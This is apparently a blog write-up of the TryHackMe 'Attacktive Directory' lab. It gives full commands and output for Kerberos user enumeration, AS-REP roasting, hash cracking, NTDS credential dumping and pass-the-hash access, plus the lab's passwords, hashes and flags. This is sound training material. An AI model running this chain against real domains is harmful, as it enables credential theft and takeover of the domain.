Written by shakuganz

TryHackMe – Attacktive Directory Write-up

Hi everyone! Today’s post is on a TryHackMe challenge on Attacktive Directory that will introduce to u Kerberos user enumeration using Kerbrute on Domain Controller (DC), AS-REP Roasting using GetNPUsers on DC, Hashcat to crack Kerberos hashes, dumping password hashes from DC, and using Evil-WinRM to access the DC. Let’s get started!

1. Deploy the machine

You can use Kali Linux, Parrot OS, or TryHackMe (THM)’s attack machine to attack the Domain Controller (DC).

2. Setup

Impacket installation

Impacket has always been very difficult to install correctly. Any missing steps often result in a brunch of errors when running tools from Impacket. Thus, TryHackMe (THM) provided us steps to install correctly. If you are using THM’s attack machine, Impacket and Bloodhound have already been installed.

Firstly, we have to clone Impacket from the GitHub repository.

kali@kali~$ sudo git clone https://github.com/SecureAuthCorp/impacket.git /opt/impacket

Next, we shall install the requirements.

kali@kali~$ sudo pip3 install -r /opt/impacket/requirements.txt

Finally, we can run the Python installation script.

kali@kali~$ cd /opt/impacket/ && sudo python3 ./setup.py install

2. Welcome to Active Directory

We first have to use nmap to check out the services available on the Domain Controller (DC). In this simple lab setup, there is only the DC available. Of course with different Active Directory (AD) environments, we may have to enumerate and attack other workstations before we have a shot to access the DC.

kali@kali~$ sudo nmap -sC -sV -n -p- 10.10.6.165
[sudo] password for kali: 
Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-11 22:05 EST
Nmap scan report for 10.10.139.4
Host is up (0.36s latency).
Not shown: 987 closed ports
PORT     STATE SERVICE       VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
| http-methods: 
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-01-12 07:17:13Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: spookysec.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info: 
| Target_Name: THM-AD
| NetBIOS_Domain_Name: THM-AD
| NetBIOS_Computer_Name: ATTACKTIVEDIREC
| DNS_Domain_Name: spookysec.local
| DNS_Computer_Name: AttacktiveDirectory.spookysec.local
| DNS_Tree_Name: spookysec.local
| Product_Version: 10.0.17763
|_ System_Time: 2022-01-12T07:18:14+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Not valid before: 2022-01-11T06:34:36
|_Not valid after: 2022-07-13T06:34:36
|_ssl-date: 2022-01-12T07:18:26+00:00; +1s from scanner time.
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49672/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open msrpc Microsoft Windows RPC
49678/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49689/tcp open msrpc Microsoft Windows RPC
49699/tcp open msrpc Microsoft Windows RPC
Service Info: Host: ATTACKTIVEDIREC; OS: Windows; CPE: cpe:/o:microsoft:windows

We can also use enum4linux on port 139/445 to enumerate the NetBIOS for information such as the existing usernames, NetBIOS-Domain Name, SID, etc.

kali@kali~$ enum4linux 10.10.6.165
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Tue Jan 11 22:10:14 2022

 ========================== 
|    Target Information    |
 ========================== 
Target ........... 10.10.6.165
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 =================================================== 
|    Enumerating Workgroup/Domain on 10.10.6.165   |
 =================================================== 
[E] Can't find workgroup/domain


 =========================================== 
|    Nbtstat Information for 10.10.6.165    |
 =========================================== 
Looking up status of 10.10.6.165
No reply from 10.10.6.165

 ==================================== 
|    Session Check on 10.10.6.165    |
 ==================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 437.
[+] Server 10.10.139.4 allows sessions using username '', password ''
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 451.
[+] Got domain/workgroup name: 

 ========================================== 
|    Getting domain SID for 10.10.6.165    |
 ========================================== 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./enum4linux.pl line 359.
Domain Name: THM-AD
Domain Sid: S-1-5-21-3591857110-2884097990-301047963
[+] Host is part of a domain (not a workgroup)

...

Questions and answers

What tool will allow us to enumerate port 139/445?

enum4linux

What is the NetBIOS-Domain Name of the machine?

THM-AD

What invalid TLD do people commonly use for their Active Directory Domain?

.local

4. Enumerating Users via Kerberos

Based on TryHackMe (THM), we are recommended to use Kerbrute for this challenge to brute force Kerberos (key authentication service in Active Directory) to enumerate usernames and passwords. A modified username list and password list have been given to us. Note that it is actually not recommended to brute force credentials due to account lockout policies.

Firstly, I downloaded Kerbrute into my Kali and change its execution permission.

kali@kali~$ wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
kali@kali~$ chmod +x kerbrute_linux_amd64

Next, I downloaded both the user list and password list.

kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/userlist.txt
kali@kali~$ wget https://raw.githubusercontent.com/Sq00ky/attacktive-directory-tools/master/passwordlist.txt

We can now check out the usage of the tool and use it on the Domain Controller (DC).

kali@kali~$ ./kerbrute_linux_amd64 --help
...
Usage:
  kerbrute [command]

Available Commands:
  bruteforce    Bruteforce username:password combos, from a file or stdin
  bruteuser     Bruteforce a single user's password from a wordlist
  help          Help about any command
  passwordspray Test a single password against a list of users
  userenum      Enumerate valid domain usernames via Kerberos
  version       Display version info and quit

Flags:
      --dc string       The location of the Domain Controller (KDC) to target. If blank, will lookup via DNS
      --delay int       Delay in millisecond between each attempt. Will always use single thread if set
  -d, --domain string   The full domain to use (e.g. contoso.com)
  -h, --help            help for kerbrute
  -o, --output string   File to write logs to. Optional.
      --safe            Safe mode. Will abort if any user comes back as locked out. Default: FALSE
  -t, --threads int     Threads to use (default 10)
  -v, --verbose         Log failures and errors

kali@kali~$ ./kerbrute_linux_amd64 userenum --dc=10.10.6.165 -d=spookysec.local.  userlist.txt
...
Version: v1.0.3 (9dad6e1) - 01/11/22 - Ronnie Flathers @ropnop

2022/01/11 22:53:06 >  Using KDC(s):
2022/01/11 22:53:06 >   10.10.6.165:88

2022/01/11 22:53:07 >  [+] VALID USERNAME:       james@spookysec.local.
2022/01/11 22:53:13 >  [+] VALID USERNAME:       svc-admin@spookysec.local.
2022/01/11 22:53:21 >  [+] VALID USERNAME:       James@spookysec.local.
2022/01/11 22:53:24 >  [+] VALID USERNAME:       robin@spookysec.local.
2022/01/11 22:53:54 >  [+] VALID USERNAME:       darkstar@spookysec.local.
2022/01/11 22:54:13 >  [+] VALID USERNAME:       administrator@spookysec.local.
2022/01/11 22:54:50 >  [+] VALID USERNAME:       backup@spookysec.local.
2022/01/11 22:55:08 >  [+] VALID USERNAME:       paradox@spookysec.local.

Questions and answers

What command within Kerbrute will allow us to enumerate valid usernames?

userenum

What notable account is discovered? (These should jump out at you)

svc-admin

What is the other notable account is discovered? (These should jump out at you)

backup

5. Abusing Kerberos

In this challenge, we can ASREPRoasting as a user account or more do not require pre-authentication details before requesting a Kerberos Ticket. Thus, we can use Impacket’s /opt/impacket/examples/GetNPUsers.py to query ASReproastable accounts from the Key Distribution Center. However, we will need to provide a list of usernames. Since previously we already brute force the list of usernames, we can use those usernames.

In my validusers.txt:

james
svc-admin
James
robin
darkstar
administrator
backup
paradox

Obtaining ASReproastable accounts.

kali@kali~$ python3 /opt/impacket/examples/GetNPUsers.py -no-pass -usersfile validusers.txt -dc-ip 10.10.6.165 spookysec.local/
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] User james doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566
[-] User James doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User robin doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User darkstar doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User backup doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User paradox doesn't have UF_DONT_REQUIRE_PREAUTH set

We can see that only svc-admin can request a ticket without a need to provide its password.

A quick google will allow us to find out we should use mode 18200 to crack the hash.

kali@kali~$ hashcat -h | grep 18200
  18200 | Kerberos 5, etype 23, AS-REP                     | Network Protocols

Finally, we can attempt to crack the password of svc-admin using hashcat. I first store the hash in hash.txt before cracking it with the password list provided previously.

kali@kali~$ cat hash.txt
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566

kali@kali~$ hashcat -m18200 hash.txt passwordlist.txt
...
$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:2b7e9937bb7ccdc4b5354ff7b299ab45$bf587d92d070e3453a9b572c3b034b9752cb843e1091e071387a3a08cf22e5a59b28798733049c210132ce913820ed8348f5c837149148934de2f83fdebc20cf28d2d601d53b89d2fccec734cc96245937addee357c179189bdab6d34c347d4cc2a3cab7d3ae1f1920908a8a1a7b54f5b2d584609498dff77b8e804e75f78493d0e0ad6bd62876f4bd27e86251fda36340f00bfec3cdfdc59233b715f045f9d2e64c7a65df6821139e4a779e89f05cd29dc0e91bdd2af1d7a48c3e796497b53a11071509c1709574860202d05a7dcba0af98e6bb5eabe12f91f6bf0e4d81ebe4a73ed7717fb6fda82a60ead82613f82e1566:management2005

It should only take a few seconds to crack the hash on a virtual machine Kali. If you do it on your Windows host, it will be even faster. We should obtain the password “management2005”.

Questions and answers

We have two user accounts that we could potentially query a ticket from. Which user account can you query a ticket from with no password?

svc-admin

Looking at the Hashcat Examples Wiki page, what type of Kerberos hash did we retrieve from the KDC? (Specify the full name)

Kerberos 5, etype 23, AS-REP

What mode is the hash?

18200

Now crack the hash with the modified password list provided, what is the user accounts password?

management2005

6. Back to the Basics

We can now attempt to enumerate SMB shared folders using our newly found credentials.

kali@kali~$ smbclient -L 10.10.6.165 -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        backup          Disk      
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share

Going through each shared folder, I found an interesting folder to which I can login and see an interesting text file.

kali@kali~$ smbclient \\\\10.10.6.165\\backup -U "svc-admin"
Enter WORKGROUP\svc-admin's password: management2005
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Apr  4 15:08:39 2020
  ..                                  D        0  Sat Apr  4 15:08:39 2020
  backup_credentials.txt              A       48  Sat Apr  4 15:08:53 2020

I downloaded the text file and looked at its content.

smb: \> get backup_credentials.txt
getting file \backup_credentials.txt of size 48 as backup_credentials.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \> exit

kali@kali~$ cat backup_credentials.txt
YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

It looks like it is base64 encoded. Thus, decoding it allows us to see a valid credential.

kali@kali~$ base64 -d backup_credentials.txt
backup@spookysec.local:backup2517860

Questions and answers

What utility can we use to map remote SMB shares?

smbclient

Which option will list shares?

-L

How many remote shares is the server listing?

6

There is one particular share that we have access to that contains a text file. Which share is it?

backup

What is the content of the file?

YmFja3VwQHNwb29reXNlYy5sb2NhbDpiYWNrdXAyNTE3ODYw

Decoding the contents of the file, what is the full contents?

backup@spookysec.local:backup2517860

7. Elevating Privileges within the Domain

Obtaining the credentials of backup allows us to have more privileges as the backup account in a Domain Controller (DC) This is because any changes to the Active Directory (AD) will reflect those changes in this backup account. As a result, we can obtain every user’s password hashes. To do so, we can use Impacket’s secretsdump.py.

kali@kali~$ python3 /opt/impacket/examples/secretsdump.py  spookysec.local/backup:backup2517860@10.10.6.165
Impacket v0.9.25.dev1+20220105.151306.10e53952 - Copyright 2021 SecureAuth Corporation

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\breakerofthings:1104:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
spookysec.local\james:1105:aad3b435b51404eeaad3b435b51404ee:9448bf6aba63d154eb0c665071067b6b:::
spookysec.local\optional:1106:aad3b435b51404eeaad3b435b51404ee:436007d1c1550eaf41803f1272656c9e:::
spookysec.local\sherlocksec:1107:aad3b435b51404eeaad3b435b51404ee:b09d48380e99e9965416f0d7096b703b:::
spookysec.local\darkstar:1108:aad3b435b51404eeaad3b435b51404ee:cfd70af882d53d758a1612af78a646b7:::
spookysec.local\Ori:1109:aad3b435b51404eeaad3b435b51404ee:c930ba49f999305d9c00a8745433d62a:::
spookysec.local\robin:1110:aad3b435b51404eeaad3b435b51404ee:642744a46b9d4f6dff8942d23626e5bb:::
spookysec.local\paradox:1111:aad3b435b51404eeaad3b435b51404ee:048052193cfa6ea46b5a302319c0cff2:::
spookysec.local\Muirland:1112:aad3b435b51404eeaad3b435b51404ee:3db8b1419ae75a418b3aa12b8c0fb705:::
spookysec.local\horshark:1113:aad3b435b51404eeaad3b435b51404ee:41317db6bd1fb8c21c2fd2b675238664:::
spookysec.local\svc-admin:1114:aad3b435b51404eeaad3b435b51404ee:fc0f1e5359e372aa1f69147375ba6809:::
spookysec.local\backup:1118:aad3b435b51404eeaad3b435b51404ee:19741bde08e135f4b40f1ca9aab45538:::
spookysec.local\a-spooks:1601:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
ATTACKTIVEDIREC$:1000:aad3b435b51404eeaad3b435b51404ee:bf23f4f1cf41c6f75b54f6acb6c90226:::

Finally, we will need to install evil-winrm to access the system since port 5985 for WinRM is open.

kali@kali~$ sudo gem install evil-winrm

Questions and answers

What method allowed us to dump NTDS.DIT?

DRSUAPI

What is the Administrators NTLM hash?

0e0363213e37b94221497260b0bcb4fc

What method of attack could allow us to authenticate as the user without the password?

pass the hash

Using a tool called Evil-WinRM what option will allow us to use a hash?

-H

8. Flag submission panel

Submit the flags for each user account. They can be located on each user’s desktop. We can just login into the administrator’s account which have access to other users’ desktops.

kali@kali~$ evil-winrm -i 10.10.6.165 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
...
*Evil-WinRM* PS C:\Users\Administrator\Documents>

We can now access each users’s desktop to obtain their hash.

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\svc-admin\Desktop
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> dir


    Directory: C:\Users\svc-admin\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:18 PM             28 user.txt.txt


*Evil-WinRM* PS C:\Users\svc-admin\Desktop> type user.txt.txt
TryHackMe{K3rb3r0s_Pr3_4uth}
*Evil-WinRM* PS C:\Users\svc-admin\Desktop> cd C:\Users\backup\Desktop
*Evil-WinRM* PS C:\Users\backup\Desktop> dir


    Directory: C:\Users\backup\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  12:19 PM             26 PrivEsc.txt


*Evil-WinRM* PS C:\Users\backup\Desktop> type PrivEsc.txt
TryHackMe{B4ckM3UpSc0tty!}
*Evil-WinRM* PS C:\Users\backup\Desktop> cd C:\Users\Administrator\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/4/2020  11:39 AM             32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
TryHackMe{4ctiveD1rectoryM4st3r}

Questions and answers

svc-admin

TryHackMe{K3rb3r0s_Pr3_4uth}

backup

TryHackMe{B4ckM3UpSc0tty!}

Administrator

TryHackMe{4ctiveD1rectoryM4st3r}

I hope this article has been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂

Advertisement

Leave a Reply

Please log in using one of these methods to post your comment:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.